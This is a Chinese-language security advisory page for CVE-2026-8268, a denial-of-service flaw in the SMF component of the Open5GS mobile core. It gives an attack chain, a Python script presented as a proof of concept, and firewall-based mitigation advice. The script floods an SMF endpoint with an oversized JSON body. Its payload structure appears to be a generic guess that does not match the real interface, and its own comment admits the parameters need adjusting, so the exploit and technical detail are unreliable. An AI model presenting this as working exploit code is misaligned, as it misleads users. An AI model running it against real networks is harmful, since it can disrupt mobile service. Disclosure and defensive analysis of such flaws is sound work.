IPBUF安全漏洞报告
English
CVE-2026-8268 CVSS 4.3 中危

CVE-2026-8268 Open5GS SMF组件拒绝服务漏洞

披露日期: 2026-05-11

漏洞信息

漏洞编号
CVE-2026-8268
漏洞类型
拒绝服务
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

拒绝服务Open5GS5G核心网DoS远程漏洞

漏洞概述

Open5GS是用于4G/5G移动核心网的开源项目。在2.7.7及之前版本中,SMF组件的OpenAPI_list_create函数存在漏洞。攻击者可远程操纵该函数导致服务崩溃,造成拒绝服务。目前官方尚未响应修复。

技术细节

该漏洞位于Open5GS的SMF(会话管理功能)组件,核心问题在于OpenAPI_list_create函数的实现缺陷。攻击者通过网络向SMF组件发送特制的恶意请求,触发该函数在处理列表创建时的逻辑错误。由于缺乏必要的边界检查或异常处理机制,这种操纵会导致系统资源耗尽或进程异常终止。攻击向量为网络(AV:N),无需用户交互(UI:N),仅需低权限(PR:L)即可发起攻击,成功利用将直接影响核心网的可用性。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别暴露的Open5GS SMF组件接口及版本信息。
STEP 2
构造攻击载荷
利用OpenAPI_list_create函数的缺陷,构造特制的恶意数据包,旨在触发逻辑错误或资源耗尽。
STEP 3
发送恶意请求
通过网络远程将恶意载荷发送至目标SMF组件的OpenAPI端点,无需用户交互,仅需低权限。
STEP 4
触发拒绝服务
目标系统处理异常请求导致SMF进程崩溃或挂起,合法用户无法访问会话管理服务,造成5G核心网功能中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ PoC for CVE-2026-8268 (Open5GS SMF DoS) This script attempts to trigger the denial of service by sending a crafted payload to the SMF OpenAPI endpoint. """ import requests import sys def send_exploit(target_url): headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-8268-Scanner" } # Malformed payload targeting OpenAPI_list_create # Adjust parameters based on specific API implementation details payload = { "operation": "create_list", "params": { "size": 999999, # Potential integer overflow or resource exhaustion "name": "A" * 10000 } } try: print(f"[*] Sending exploit payload to {target_url}...") response = requests.post(target_url, json=payload, headers=headers, timeout=10) print(f"[-] Request sent. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[!] Connection error or potential DoS triggered: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <http://target-ip:port>") sys.exit(1) target = sys.argv[1] send_exploit(target)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施
建议在补丁发布前,严格限制对Open5GS SMF组件的网络访问,利用防火墙规则阻断非受信来源的连接。同时,应增强系统监控,以便在发生服务崩溃时快速告警并尝试自动恢复服务。

参考链接